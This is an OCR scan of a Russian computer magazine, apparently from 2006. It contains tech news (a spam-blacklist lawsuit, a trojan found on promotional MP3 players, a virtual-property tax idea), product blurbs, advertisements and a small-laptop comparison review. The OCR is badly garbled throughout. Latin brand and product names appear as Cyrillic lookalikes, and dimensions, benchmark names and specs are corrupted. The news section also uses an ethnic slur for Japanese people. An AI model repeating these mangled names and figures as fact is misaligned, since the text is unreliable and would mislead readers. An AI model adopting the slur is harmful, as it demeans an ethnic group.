Судебные страсти между сетевыми компаниями кипят повсе- 
местно. Одним из самых громких конфликтов сейчас касается 
ЕЗбОІпзідИі и ЗраппНаиз. Первая легально занимается коммер- 
ческой рекламой в Сети, вторая ведетчерный список спамеров 
и блокирует почту с этих адресов. Когда в этом черном списке 
оказалась ЕЗбОІпзідІіі, ей это очень сильно не понравилось. 
Фирма даже подала в суд требование извлечь свое доброе имя 
из базы грязных спамеров и в качестве моральной компенсации 
выплатить почти 12 миллионовзеленых. Так как Зратіпаиз бази- 
руется в Британии, а суд прошел в США, антиспамеры повино- 
ваться решению суда отказались: мол, ваши законы тут неписа- 
ны. Американские юристы таким непослушанием возмутились 
и пообещали вообще прикрыть лавочку. А для этого связались 
с ІСАЫЫ — международной организацией, занимающейся рас- 
пределением доменных имен в интернете, и попросили приос- 
тановить работу неугодного сайта. Эти действия суда вызвали 
много дискуссий на форумах. Люди считают, что ІСАЫЫ не должна 




вмешиваться в противостояние 2-х сторон, так как ее 
задача — управлять системой доменных имен в целом, 
а не отдельными именами. И согласие ІСАИИ будет 
расцениваться как зависимость отСША. Пойдет ли 
организация навстречу Америке или сохранит нейтра- 
литет — об этом вы узнаете в следующей серии нашего 
блокбастера на канале «Хактиви»! 



+ 160 ГБ В КАРМАНЕ 




Наверное, тебе уже не хватает емкости твоей флешки для того, 
чтобы носить с собой все необходимые файлы. Если это так, 
тоты наверняказахочешь приобрести новинку от компании 
ѴѴезіегп ЭідііаІ — устройство РаззроЛ РогіаЫе. В ультракомпак- 
тном стильном корпусе тебя ждутотбО до 160 Гб свободного 
пространства (это хард со скоростью вращения шпинделя 
— 5400 оборотов), а весит девайс всего 140г. Вместе с ним пос- 
тавляется обширный набор ПО, все данные на нем шифруются 
128-битным ключом, а с компом его связывает кабель 1)8 В 2.0. 
Также порадуются и любители ноутбуков, ведь для них в ассор- 
тименте компании появились НЭЭ Зсогріо емкостью до 160 Гб. 
Это 2,5-дюймовые 8АТА- и ЮЕ-диски, в которых применяется 
технология РМР — перпендикулярная магнитная запись. Кроме 
того, они малошумные (фирменные технологии ѴѴГі ізрегЭгіѵе 
и ЗоЛЗеек), ударопрочные (ЗИоскОиагсІ и ЭигаЗіер Натр), а так- 
же обладают низким энергопотреблением. Скорость враще- 
ния шпинделя составляет у них 5400 оборотов в минуту. 



Ч ТРОЯНЫ 
ОТ МАКДОНАЛДСА 

Макдоналдсы нынче кормят весь мир, а в Японии это 
вообще чуть ли не национальная пища. Там даже 
конкурсы с подарками устраивают для постоянных 
посетителей. Недавно компания Соса-Соіа и японский 
филиал МсЭопаІсГз провели промоакцию, раздавая 
фанатам гамбургеров на халяву цифровые плееры. 

Но недолго радовались гамбургероеды: оказалось, 
плееры эти с сюрпризом. А если точнее — с трояном 
СЮразз зруѵѵаге, затесавшимся между 1 0-ю записан- 
ными треками. Стоит ли говорить, что япошки, узнав об 
этом, подняли шум и грозили за такое исключить навеч- 
но из своего меню картошку фри с полуторной колой. 
Но Макдоналдс — он ведь хитрый — тут же извинился, 
сообщил, что накладочка-с вышла, и проинструктиро- 
вал народ, как излечить комп от заразы. А все плееры, 
которые не успели попасть в засаленные руки пожира- 
телей котлет в тесте, были в срочном порядке отозваны 
из продажи. Морали у этой истории две: «бесплатный 
сыр бывает только в мышеловке» и «держись от Макдо- 
налдсов подальше». 
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-> ВИРТУАЛЬНЫЕ НАЛОГИ 



Если ты, как и я, проводишь кучу времени в виртуальных 
мирах, тебя порадует эта новость. Буржуи всерьез подумы- 
вают о том, чтобы ввести налог на. . . виртуальную собствен- 
ность! Например, в таких мирах, какЗесопсІ Ше или ѴѴогІб оі 
ѴѴагсгаф можно покупать дорогие вещи и накапливать бо- 
гатство. По мнению экономиста Дэна Миллера, виртуальным 
богатеям пора начать делиться с правительством. И не вир- 
туальными фантиками, а реальными долларами. Особенно 
это касается тех игр, где обмен виртуального добра на реал 
случается сплошь и рядом (тот же ЗесопсІ Ыіе). Сейчас этот 
бред находится на начальном этапе продумывания — Мил- 
лер с компанией изучают рынок виртуальной собственности 
и обороты средств в онлайновых мирах. Но какзнать, может 
уже через полгода Сенат посчитает его хорошей идеей 
и обязует игроманов выплачивать за эпические артефакты 
баксы в казну государства. А потом, как правильно заметил 
товарищ с зесигііуІаЬ.ги, начнут брать налог на строительс- 
тво с поклонников тетриса и судить за массовые убийства 
фанатов ЗО-шутеров. Правда, налоговый беспредел грозит 
разве что американцам — у них там все повернуты назако- 
нах. Если ты живешь в России, опасаться тебе пока нечего. 




Самая быстрая видеокарта в мире: мощь 
48 пиксельных продессоров. 



Непревзойдённое качество изображения: 
НОЯ и полноэкранное сглаживание работают 
одновременно. 



Поддержка технологии СЯОЗЗРІНЁ: 
используйте две видеокарты для получения 
максимальной произво д и тел ьности . 



Узнайте больше, посетив 
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-» ДЕВОЧКА И БУШ 

Спецслужбы США в очередной раз жгут. В октябре прошла 
чуть ли не операция «Буря в пустыне» по задержанию 
14-летней девочки прямо в здании школы. Маленькая 
конопатенькая Джулия вовсе не торговала наркотой и не 
взрывала Пентагон, а всего лишь оставила в Сети карика- 
туру с изображением корчащегося в предсмертных муках 
президента и подписью: «Убить Буша». Да и весь остальной 
контентстранички свидетельствовал о явной нелюбви авто- 
ра к дяде Бушу. Арестовав ребенка во время урока биологии 
и допросив его с пристрастием, спецназ выяснил, что 
Джулия заговора не замышляет, киллера нанимать не плани- 
рует и всего лишь не любит президента своей страны. «Вы 
что, я очень миролюбивая девочка и слушаюсь маму» , — при- 
зналась маленькая проказница. Злополучная страничка была 
расположена на бесплатном хостинге тузрасе.сот, и если 
хорошенько поищешь, ты ее наверняка найдешь. 




-» СОМРЯО’МЕТИРУЮЩИЕ 
ТЕЛЕВИЗОРЫ 



Известная своими тюнерами компания Сотрго представляет нам 
свою очередную новинку — устройство ѴібеоМаіе Т750, которое 
является внутренним ТѴ- и РМ-тюнером, размещенным на РСІ-плате. 
С его помощью ты сможешь смотреть цифровое и аналоговое 
телевидение, записывать на ПК и то и другое, а также записывать 
радиопередачи и оцифровывать свои старые видеокассеты (все 
необходимое для этого имеется). С этим девайсом поставляется 
обширный набор программного обеспечения, который, помимо 
продуктов для просмотра и редактирования видео- и фото- 
материалов, содержит в себе фирменное ПО СотргоЭТѴ 3. С его 
помощью можно полностью раскрыть возможности этого устройс- 
тва: задать запись программ по расписанию; включить функцию 
іітезЫф найти и настроить все возможные каналы; сделать 
идущую программу обоями рабочего стола; включить функцию 
«картинка в картинке»; настроить яркость, контрастность и другие 
параметры изображения; а также сделать многое другое. 




4 БОИ РОБОТОВ НА ВВЦ 

С 17 по 20 октября в Москве на ВВЦ проходила очень 
занимательная выставка — «Робототехника - 2006». 
Несмотря на громкий статус «международная», вся 
экспозиция поместилась на 2-х этажах и обойти ее 
можно было минутзаб. 

На первом этаже были представлены экспонаты, 
которыми гордится российская промышленность. 
Различные роботизированные устройства для тушения 
пожаров, обезвреживания бомб и аэрофотосъемки 
— это очень важно и нужно. 

Второй этаж был на 50% отдан детям-конструкторам 
роботов. Эти 10-летние парни безо всякого читерства 
наделали разных движущихся роботов, которые борятся 
друге другом, ищут и выталкивают за пределы ринга 
банки, бегают по черной линии, распознавая ее контуры 
и т. д. На втором этаже был также был представлен рос- 
сийский ответ Зопу: робот-собака на колесиках черного 
цвета. Этот пес странным голосом гавкал и, если к нему 
прикоснуться, просил не трогать его руками. 

Гвоздем выставки выступали организованные фирмой 
«Андроидные роботы» бои соответствующих роботов: 
управляемые людьми при помощи пультов, монстры 
пытались завалить друг друга на спину и удерживать 
положенное количество секунд. Выглядело это очень 
забавно — можешь убедиться, посмотрев видеоотчетс 
выставки на нашем ЭѴЭ. 
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-» МА ТРИЧНЫЙ ЗВУК ОТ Ш6ІТЕСН 



Тѳм геймерам, которые собираются 
в ближайшее время поменять аудио- 
систему, рекомендую присмотреться 
к шестиканальному устройству Х-450 от 
компании І_одііесГі. Оно обладаеттех- 
нологией матричного звучания, то есть 
поступающий от аудиоисточника сигнал 
обрабатывается декодером и преобразо- 
вывается из обычного двухканального сте- 



реоформата в пятиканальный звуковой 
поток. Но если тебе захочется вернуться 
в прошлое и послушать стереозвук, то 
никаких проблем не возникнет — этот 
режим можно легко отключить. Наверняка 
у тебя стоиттонкий и изящный ЖК-экран. 
Ему не придется оставаться в стороне, так 
как данная акустическая система имеет 
специальный запатентованный держатель 



центрального динамика, позволяющий 
установить его на І_СО-панель. Дизайн 
колонокстилен и функционален. Прочные 
металлические решетки защищают ди- 
намики фронтальных и тыловых колонок, 
так что их можно даже пнуть (несильно), 
если тебя убил очередной орк. Колонки 
появятся в продаже осенью и будут стоить 
чуть больше 100 евро. 








МУЛЬТИМЕДИА 

гѵЕгм 



М5-970 

* Мощный сабвуфер 

* Чистые верка 

* Сверхвысокая детализация 

* Профессиональные настройки 

* Глубокий бас 

на любом уровне громкости 
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Если ты следишь за тем, как 
развивается и эволюционирует 
племя мобильных компьюте 
ров, то наверняка заметил, что 
в последнее время среди них 
стали появляться настоящие 
монстры. Это ПК с диагональю 
экрана в 17 и 19 дюймов, ос- 
нащенные двуядерными про- 
цессорами, объемами памяти, 
сходными по своим размерам с 
некоторыми 

жесткими дисками, и чуть ли не 
парой видеоплат. Естественно, 
и цена у них соответствующая, 
напоминает аналогичный пока- 
затель спортивного авто (осо- 



бенно по сравнению с обыч- 
ными седанами). Но это все на 
любителя! Классический ноут- 
бук можно и нужно легко и не- 
принужденно носить с собой, 
а как это сделаешь с нафар- 
шированным по самое не могу 
девайсом весом килограммов 
в 5? Поэтому сегодня мы обра- 
тимся к небольшим ноутбукам, 
заточенным под переноску и 
работу в дороге. Конечно, они 
не могут похвастаться сверх- 
высокой скоростью работы, 
НО их мощности вполне хватит 

для выполнения обычныххакер- 

ских задач. 
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Методика тестирования 

Тесты проводились в двух режимах: при 
питании от сети и при автономной работе. 
В самом начале с помощью утилиты І_аѵаІуз 
ЕѵегезІ мы получали подробнейшую инфор- 
мацию о системе. Потом, используя про- 
граммы З&М (нагружает систему по полной) 
и ТгоШеѴѴаІсІі (логирует частоту процессо- 
ра, напряжение и прочие параметры), мы 
выясняли правильность работы ПК по схе- 
мам питания аіѵѵауз оп (при работе от сети) 
и Іаріор (при работе от аккумулятора). Дело 
в том, что если при работе от сети ноутбуки 
функционировали нормально, то в режиме 
Іаріор некоторые могли вести себя плохо, то 
есть не снижать яркость экрана, не сбрасы- 
вать частоту работы и напряжение процес- 
сора. Это негативно отражалось на време- 
ни работы, а результаты тестов получались 
некорректными. В том случае если все было 
нормально, то запускался тестовый комп- 
лект: утилиты ЗЭМагк 20013Е, ЗЭМагк 2003, 
РСМагк 2004 и РСМагк 2005. При работе от 
сети к ним добавлялась программа ВаНегу 
Еаіег, с помощью которой мы определяли 
время автономной работы устройства. 










Затзипд 035 

••••••••оо 

Процессор, ГГц: 1 ,6, ШіеІ Соге ЗоЮ 

Память, Мб: 51 2 

Видеоплата, МБ: 128, МоЬІІе ШіеІ 945ѲМ 
Ехргезз 

Жесткий диск, Г б: 60 

Оптический привод: оѵо-ном/со-нѵѵ 

Средства связи: модем, І-АЫ, віиеіооііт 

Интерфейсы: ІІ5В, тіс, еаг, РС-Сагй, тіпі- 
РігеѴѴіге, ѴОА 

Гавариты, ММ: 329x272x33 
Вес, КГ: 2,7 

Корпус устройства Затзипд выкрашен 
в благородный серый цвет и не имеет ка 
ких-либо дизайнерских изысков, все выпол- 
нено классически. По его периметру, что от- 
радно ты не найдешь никаких устаревших 
портов, вроде СОМ или І_РТ, зато все нужные 
имеются (тіпі-РігеѴѴІге и 1156; последних, 
правда, маловато - всего парочка). В тес- 
тах на производительность этот ноутбук по- 
казал очень приличные результаты, причем 
как при работе от сети, так и от аккумулятора. 
Но в последнем случае это следствие не его 
немереной крутости, а неумения правильно 
работать в режиме Іаріор. Частота процессора 
не сбрасывается, остается той же; только 
яркость экрана по умолчанию снижается 
очень существенно, работать становится 
некомфортно. Правда, на времени автоном- 
ной работы это не сказалось, он проработал 
более двух с половиной часов - отличный 
результат! Из недостатков можно отметить 
плохо закрывающийся лоток оптического 
привода (хотя, возможно, это минус только 
конкретного экземпляра). Нас порадовала 
клавиатура с мягкими клавишами и наличие 
картридера. 



М8І МедаВоок 8271 

•••••••ООО 

Процессор,, ГГ Ц: 1,6, Тигіоп 64 Тауіог ОиаІ 
СогѳТЬ50 

П амять., Мб: 768 
Размер экрана., дм: 1 2, і 
Видеоплата^ Мб: 64, АТІ Пабеоп Хргѳзз 
1150 

Жесткий диск., Г б: 60 
Оптический привод: оѵо яѵѵ оі_/со-рѵѵ 
Средства связи: модем, ЬАЫ, ВІиеіооіИ, 
ѴѴіРі 

Интерфейсы: ѴОА, 115В, тіпі-РігѳѴѴіге, тіс, 
еаг, ЗРЭІР, РС-СагсІ 

Гавариты^ ММ: 303x225x29 
Вес., КГ: 1,95 

Крышку этого девайса в корпусе темного 
цвета украшает и несколько оживляет огром- 
ный логотип фирмы-производителя. Ком- 
пания МЗІ снабдила свой ноутбук двуядер- 
н ы м процессором АІѴЮ и большим объемом 
оперативной памяти, благодаря чему ноут 
показал результаты выше средних. А пол- 
ный набор средств связи, универсальный 
оптический привод, клавиатуру с мягкими, 
почти неслышными клавишами и звуковую 
плату стандарта Агаііа смогут оценить все. 
Не встроенная, а самостоятельная видеоп- 
лата дала возможность этому устройству 
пройти тест ЗЭМагк 2005 (на остальных но- 
утах он просто не запустился). Небольшой 
конструкторский просчет — 2 слота РІ5В, 
помещенные на правый борт устройства, 
расположены слишком близко, что не поз- 
волит одновременно подключить к ним га- 
баритные девайсы. Зато время автономной 
работы не подкачало, да и в режиме Іаріор 
ноутбук этот работал абсолютно правильно. 
Дополнительный плюс — небольшая ноут- 
бучная мышь в комплекте поставки. 
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ВепО «ІоуЬоок 853ѴѴ 

•••••••ООО 

Процессор, ГГц: 1 ,86, Іпіеі Репііит М 

Память, Мб: 512 
Размер экрана, дм: із 
Видеоплата, Мб: 128, іпіеі ѳмаэоо 
Жесткий диск, Гб. 80 

Оптический привод: оѵо-пѵѵ оілсо-вѵѵ 
Средства связи: модем, І-АЫ, ІЮА, ѴѴіРі 
Интерфейсы: 1)5В, РігеѴѴіге, ЗРОІР, ѴѲА 
РСМСІА, репликатор портов, тіс 

Г-ЭБЭриТЫ , ММ: 324x2227x34 

0&С КГ: 2,1 

Если ты не стеснен в средствах, то можешь 
подарить этот ноутбук своей девушке, так 
как его корпус и клавиатура выкрашены в 
молочно-белый цвет. Выглядит это доволь- 
но эффектно. В тестах на общую произво- 
дительность этот ноутбук показал хорошие 

результаты, авотграфикаявнонеего конек. 

Причина кроется в слабенькой встроенной 
видеоплате. Это обернулось средним ре- 
зультатом в тесте ЗОМагк 2003. Так что для 
игр с крутой графикой он явно не подойдет. 
Зато он имеет диагональ экрана немного 
большую, нежели чем у других участников 
теста, встроенный микрофон, инфракрас- 
ный порт и гнездо для репликатора портов 
(приобретается отдельно), который помо- 
жет тебе подключить к своему мобильному 
другу все, что захочется. Хотя джентльмен- 
ский набор портов тут присутствует. Так же 
как картридер и универсальный оптический 
привод. От аккумулятора этот девайс про- 
работал более полутора часов. 
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ТозіііЬа Рогіеде В200 

#•••••0000 

Процессор, ГГц: 1 ,2, Іпіеі Репііит М 

Память, МЕ: 51 2 
Размер экрана, дм: 12 
Видеоплата, Мб: і 28, іпіеі ѲМА 900 
Жесткий диск, Г б: бо 
Оптический привод: отсутствует 
Средства связи: модем, ІАЫ, ІЮА, ѴѴіРі, 
ВІиеІооІП 

Интерфейсы: 115В, ѴѲА, РСМСІА, тіс, еаг, 
репликатор портов 

Гавариты, ММ: 287x229x1 8 
Бас, КГ: 1,2 

В своем стремлении сделать устройство бо- 
лее мобильным создатели ТозІтіЬа Рогіеде 
Р200 пошли так далеко, что лишили его 
встроенного оптического привода. Резуль- 
тата два: положительный заключается в 
том, что девайс стал очень легким и тонким, 
а отрицательный — в том, что для работы с 
внешними носителями есть только картри- 
дер. Конечно, есть порты 1)ЗВ, но это все 
не очень удобно. Хотя, может, этот привод 
тебе и не нужен! Другой заметной особен- 
ностью этого ноута является наличие в нем 
сканера отпечатков пальцев, который в со- 
трудничестве с прилагаемым программным 
обеспечением существенно повысит безо- 
пасность твоих данных. Но за компактность 
надо платить: обладая не самой мощной на- 
чинкой, Р200 показал последний результат в 

тесте ЗЭМагк 2003, а РСМагк на нем вообще 
не пошел, так же как и ЗЭМагк 2001. От ак- 
кумулятора он проработал чуть больше по- 
лутора часов. В общем, это очень легкий и 
тонкий ноутбук, который подойдет тем, кто 
занят работой в дороге, ищет мобильное 
устройство и озабочен проблемой защиты 
своихданных. 



РеІІ ЬаШисІе 0420 

• ••••• о о о о 

Процессор, ГГ ц: 1 ,66, Іпіеі Соге Зоіо 

Память, Мб: 1024 
Размер экрана, дм: 12,1 
Видеоплата, Мб: выделяется из систем- 
ной, Іпіеі ОМА 950 
Жесткий диск, Г б: 60 
Оптический привод: рѵо-вѵѵ 
С редства связи: модем, І_АІЧ ігйА, 
ВІиеІооІІт, ѴѴіРі 

Интерфейсы: ІІЗВ, РСМСІА, ѴОА, РігеѴѴіге, 
тіс, еаг (на ноутбуке), ІІЗВ, РігеѴѴіге, ѴОА, ЭѴІ, 
1_РТ, тіс (на универсальной подставке) 

Г авариты, ММ: 295x209x25 
Вес, КГ: 1,4 

Это устройство, имеющее довольно ориги- 
нальную структуру. В комплекте поставки 
есть так называемая универсальная под- 
ставка, на которой находятся оптический 
привод и дополнительные порты. Если эти 
вещи тебе необходимы, то цепляешь ее к но- 
уту, а если нет, то ходишь без нее (джентль- 
менский набор портов есть непосредствен- 
но на самом устройстве). Причем девайс сам 
посебеоченькомпактныйилегкий. Из инте- 
ресного на нем есть миниджойстик для уп- 
равления курсором и считыватель отпечат- 
ков пальцев. Так что можешь быть спокоен 
за свою коллекцию пикантных картинок, до 
нее никто не доберется. Обладая качест- 
венной начинкой (гигабайт памяти, полный 
набор средств связи), 0е\\ І_а1і1исіе Э420 по- 
казал средние результаты в тестах. Время 
автономной работы на среднем уровне. Это 
тонкая и легкая (без подставки) машина для 
тех, кому нужны развитые коммуникацион- 
ные средства и кто не планирует играть в 
вещи с наворотами в графике. 



ЗопуѴАІО 

ѴСЫ-ТХЗХКР 
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Процессор, ГГ Ц: 1 ,26 Іпіеі Соге Зоіо 111400 

ПАМЯТЬ, МБ: 1024 
Размер экрана, дм: 1 1 
Видеоплата, Мб: 128, іпіеі ома 950 
Жесткий диск, Г б: 80 
Оптический привод: оѵэ+вѵѵ 
Средства связи: модем, 1_АІ\І, Віиеіооіб, 
ѴѴіРі 

Интерфейсы: эзв, рсмсіа, ѵоа, іипк, 

тіс, еаг 

Г авариты, ММ: 195x274x25 
Вес, КГ: 1,2 

Самый маленький ноутбук из всех, учас- 
твующих в тесте. Девайс отличается 
длительностью работы от аккумулятора 
— абсолютный рекорд обзора. Конечно, 
производительность его несколько ниже, 
чем у более габаритных собратьев, но за все 
нужно платить. При этом ноутбук обладает 
всеми необходимыми средствами связи, 
включая беспроводные, нужными портами, 
оптическим приводом и жестким диском 80 
Гб. Правда, видеоподсистема подкачала 
(встроенное решение) и тест ЗОМагк 2005 
пройден не был, но это беда многих участ- 
никовивообщекомпактныхноутов. Из инте- 
ресных особенностей можно отметить кноп- 
ку режима АѴ (Аисііо-Ѵісіео), вызывающую 
мультимедийный проигрыватель и наличие 
соответствующих клавиш управления. Так- 
же имеется сканер отпечатков пальцев и 
программное обеспечение, необходимое 
для его использования и осуществления 
пропускного режима. Не стоит забывать 
про стильный внешний вид девайса, а также 
очень привлекательную по виду и удобную 
по сути клавиатуру. 
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ТОВАР СЕРТИФИЦИРОВАН 



ЦЕНТР ДОМАШНИХ 

МУЛЬТИМЕДИА 

РАЗВЛЕЧЕНИЙ 

Персональный компьютер ФРОНТ Т-90 (600) на базе передовой 
разработки компании Іпіеі, процессора нового поколения Іпіеі® 
Соге™ 2 йію - это потрясающее быстродействие в обработке 
информации и максимальная производительность, 
обеспечивающие комфортную работу сразу с несколькими 
ресурсоемкими приложениями и возможность наслаждения 
новейшими разработками мультимедиа-индустрии. 





ФР <г М7 



Обозначения ВиппуРеорІе, Сеіегоп, Сеіегоп Іпзісіе, Сепігіпо, логотип Сепігіпо, СЫрз, Соге Іпзісіе, Оіаіодіс, ЕІІтегЕхргезз, ЕТОХ, РІазИРІІе, І386, І486, І960, іСОМР, ІпзІапІІР, Іпіеі, логотип Іпіеі, ІпІеІ386, ІпІеІ486, ІпІеІ740, ІпІеЮХ2, ІпІеЮХ4, ІпІеІ5Х2, Іпіеі Соге, Іпіеі Іпзісіе, 
логотип Іпіеі Іпзісіе, Іпіеі. І_еар аЬеасІ., логотип Іпіеі. І_еар аЬеасІ., Іпіеі ІЧеІВигзІ, Іпіеі ЫеІМегде, Іпіеі МеІЗІгисІиге, Іпіеі ЗіпдІеОгіѵег, Іпіеі ЗреебЗІер, Іпіеі ЗІгаІаРІазЬ, Іпіеі Ѵііѵ, Іпіеі ХЗсаІе, ІРЫпк, Ііапіит, Ііапіит Іпзібе, МСЗ, ММХ, логотип ММХ, логотип Оріітігег, 
ОѵеЮгіѵе, Рагадоп, РОСМагт, Репііит, Репііит II Хеоп, Репііит III Хеоп, РеіТогтапсе аі Уоиг СоттапсІ, Репііит Іпзісіе, зкоооі, Зоипб Магк, ТЬе Сотриіег Іпзісіе., ТМе Эоигпеу Іпзісіе, ѴТипе, Хеоп и Хеоп Іпзісіе являются товарными знаками, либо зарегистрированными 
товарными знаками, права на которые принадлежат корпорации Іпіеі или ее подразделениям на территории США и других стран. 



НА ПРАВАХ РЕКЛАМЫ 
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НР Ьепоѵо 3000 VI 00 




Процессор^ ГГ Ц: 1 ,8, ІпіеІ Соге Эио 

Память, МБ: 1024 
Размер экрана, дм: 1 2 
Видеоплату Мб: 128, іпіѳЮМАЭбО 
Жесткий диск, Г б: 1 00 
Оптический привод: оѵэ+я эі_ 

Средств а связи: модем, І_АЫ, ВІиеіооіИ, 
ѴѴіРі 

Интерфейсы: ІІЗВ, РСМСІА, Рігѳ-ѴѴіге, 
ѴОА, тіс, еаг 

Г авариты, ММ: 305x227x31 
Вес, КГ: 1,8 

Это одна из самых производительных 

систем в нашем обзоре. Такой выигрыш 
ѳй дают двуядерный процессор Іпіеі и ги- 
габайт оперативной памяти. Правда, ре- 
зультаты несколько снижаются при работе 
от аккумулятора, но зато и время автоном- 
ной работы не самое маленькое более 
ста минут. Помимо этого, данный ноутбук 
имеет привлекательный дизайн, удобную и 
мягкую клавиатуру, атакже несколько быс- 
трых клавиш, что увеличивает удобство 
его использования. Кроме того, он обла- 
дает стандартным набором портов, сло- 
тов, средств связи и универсальным опти- 
ческим приводом. Правда, видеочип, как 
и у большинства участников, тест ЗЭМагк 
2005 не осилил, во время его проведения 
система зависла. Зато мы имеем здесь 
дактилоскопический сканер и програм- 
мное обеспечение, позволяющее на его 
основе выстроить для своего мобильного 
друга систему безопасности. Корпус этого 
ПК имеет серо-черную раскраску и сгла- 
женные углы, так что с внешним видом все 
неплохо. 



Асег Т гаѵеІМаіе 
3012ѴѴТМІ 

• ООО 



ѴѴіРі, 



Процессор, ГГ Ц: 1 ,6, Іпіеі Соге Зоіо 

ПАМЯТЬ, МБ: 1024 
Размер экрана, дм: 1 2 
Видеоплата, Мб: 128, ітеі ОМА 950 
Жесткий диск, Гб: 120 
Оптический привод: эѵо+яѵѵ эі_ 
Средства связи: модем, І_АІ\І, 
ВІиеКюІб, ІгЭА 

Интерфейсы: ІІЗВ, РСМСІА, ѴОА, Ріге-ѴѴіге, 
тіс, еаг, репликатор портов 

Гавариты, ММ: 297x210x27 
Вес, КГ: 1,5 

Небольшой корпус этого ноутбука имеет 
2 цвета — черный и серебряный, выглядит 
все стильно, а места занимает немного. Да и 
вес не особо велик. Производительность 
тут очень и очень хорошая — все благодаря 
двуядерному процессору и гигабайту памя- 
ти. Не подвели и другие компоненты, в осо- 
бенности средства связи, — все на месте. 
Набор портов невелик, но все необходимое 
присутствует. А вот оптического привода 
нет! Точнее, нет его в корпусе ноута, он вне- 
шний (поставляется в комплекте). В общем, 
удобно: если он тебе не нужен, то ты его не 
берешь с собой и имеешь компактный де- 
вайс, а если нужен, то ничего не поделаешь. 
Отсутствие привода в корпусе компенсиру- 
ет наличие в нем микрофона и ѵѵеЬ-камеры. 
Но все-таки внешний оптический привод 
понравится не всем. Кому не хватит встро- 
енных портов, понадобится покупать спе- 
циальный репликатор, гнездо для него есть. 
Главный минус — времяавтономной работы, 
тест РСМагк 2005 выполнен не был по при- 
чине банальной разрядки батареи. А все 
потому, что Асег ТгаѵеІМаіе 3012ѴѴТМІ отка- 
зывается в автономном режиме сбрасывать 
частоты проца. 



Выводы 

Сегодняшнее тестирование показало, что 
ноутбуки небольшого размера стали гораз- 
до более удобными в использовании и серь- 
езными в техническом отношении девайса- 
ми. Они избавились (в большинстве своем) 
от никому не нужных, древних портов, при- 
обрели картридеры, всевозможные средства 
связи, объемные жесткие диски, большой 
объем оперативной памяти и мощные про- 
цессоры. Все это делает их способными к 
активной работе с большинством совре- 
менных приложений, причем как на рабочем 
столе (при подключении к источнику тока), 
так и в дороге (при работе от батарей). Вре- 
мя автономной работы у большинства из них 
вполне достаточное. Единственная серьез- 
ная проблема, которая была обнаружена, 
— это слабость графической подсистемы 
вследствие использования встроенных ус- 
тройств (но это плата за мобильность и дли- 
тельное время автономной работы). «Выбо- 
ром редакции» сегодня становится ноутбук 
НР 1_епоѵо 3000 Ѵ100. Он компактный, имеет 
все необходимые компоненты, включая ска- 
нер отпечатков пальцев, показал приличные 
результаты в тестах. А «Лучшая покупка» 
_ это Затзипд 035, который в своих ха- 
рактеристиках сочетает приемлемую цену с 
хорошей производительностью и временем 

жизним от батареи. -я- 
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{ег-ЫаЬ выражает Благодарность ва предоставленное на тестирование ОБОрудсвание компании Вирт Текнолоджис (т. (495) 745-3645, 
•ѵ/\ѵ"ѵ/.ѵігіги) . а так же российским представительствам компаний Асег, Вепр, ЕЕІ_І_, М5І, Загпгипд, Зопу и ТсзМЬа. 
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Во Власти Качества 

Идеальное изображение 





те^нотреаэ 

( 495 ) 970 - 13-83 
ѵѵш.ІесЬпоігасІе.гу 



МОСКВА: Акснте* 4495) 7Ѳ-1-72-24 Аркіис (405) 080-54-07, БапьЛ Ветер ЦИФРОВОЙ (495) 730-30-30, ДиіъэЙн (-1951 969-22-22; Инлайм (495) 94 1-61-0 і 
К омпания Мир (495) 7ШР0-ВД: М И идео (495} №77.75. НеоГорг (495) 383-36.75 Някс (495) 71 БОе 01; Опди (495) 7В4-Р2Л8; 

(Тадиоийыпеігт компьютер (4&3) 953 61 /Н. Сетевая Лаборатория (49$) /84>Б4 90 СтяртМастер (495) 9В7 15-15. Ф Центр (495) 19564 4/; 

Осзісгѵ Со-іщик-гй (495) 970-00-07 ЫТ-СоГгіриІсТ (495) Э7СЧ9-30 Г Роіапа (495) 755-55-57 ІАТНА Еісеігйпкж 1495) 775-75-66 иБМ-СоггфиЬсгя <4-Э5Ь 221-72-53, 
БАРНАУЛ: НОМРшшй Мцй«П (3952) 24-45-57 К-ТрОйд (ЭѲ52) 66-69-00, БЛАГОВЕЩЕНСК: ОЗТМ (4162) 37-56-56 ВЛАДИВОСТОК; ОН5 (4232) ЗМ4-54, 
ВОЛЖСКИЙ: Кибер (6413) 31-35-60; ЕКАТЕРИНБУРГ: Белый Ветер (3*13) 377-65-18, ИРКУТСК: Кеитеи-Компьютерс (3952) 2533-38; 

КАЗАНЬ: Алгоритм 10432] 73^77-32 КИРОВ: ТехЛром (8332) 35-13-26 КРАСНОДАР: Влади- (0812] 10-Ш-01, Окей Компьютер (8012) 15-1Ы4; 
КРАСНОЯРСК: Алерс (3917) 560 561 КомпакнИ Стяркеи(3917> 67 33 99; НИЖНИІЛ НОВГОРОД: ЮС Г {6317) /6 55 7Н НОВОСИБИРСК: ДИВДЖ (3837) 35 67 73; 
Зет ИСК (ЗВ37) 17-51 47; Компании Готти (ЗВ37) 11 00-17. Левей (3837) 70 96 45 ОМСК: І.нэнее Геяннка (361?) 23-33/7 Инсист (3837) 53 16 1/ 
ПЕРМЬ: ГАСКОМ (3422] 36-37-75. Матрица (3422) 100-108. ПЕНЗА: Формой (8412) 5-М0-42. РОСТОВ-НА-ДОНУ: ЭвииТ (88321 72-66-50, 

ТскдаЛогКч (8632) 90-31-П ОпіТгДбс (6632) 97-30-14 САРАНСК: ООО сНаімагор» (0342) 32-Ѳ2-32, Тес) (6342) 24-05-01, САРАТОВ: АТТО (8452] 44^1-11, 
КшняьюМаркет (8152) 2СИЭ-И САМАРА: Аксус (8462) 70-98-11, ГЕОС (8462) 704)5-65; Прагма (6482) 70-17-01, ТОЛЬЯТТИ: Опенке (8462) 2500-00. 
Пре тыя {ЁІІ62) 70-17-01. ТОМСК: Мутант (3822) 56-00-56. ТЮМЕНЬ: Арсе+іап (3452) 46-17-74, УЛАН-УДЭ: Смежный Барс (3012) 43-00-00. Фриком [3012] 55-10-18. 
УЛЬЯНОВСК: ОСЮ *Рдздопь*и (8427) 4176-87: УФА: Кпаыае (3 4771 917117 ЧЕЛЯБИНСК: Дайрер (ЗЫ?> 34 46-93 Найфл <3817) 61.77 91; 
НйВДС-ЭВМ 0512) 32 ЁЗ-50 






Небольшая и очень легкая мышь с красивым корпусом 



' теггит 



ЫЕООПІѴЕ 5Р-1 01 8 



ЮЫ ѴАОТС170А 




Скоростной оптический привод от компании §опу, 
поддерживающий все форматы ОУО, за очень 
скромные деньги 




ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 
Интерфейс: АТАРІ 
Скорость записи: 

0Ѵ0+/-Я - 18х 
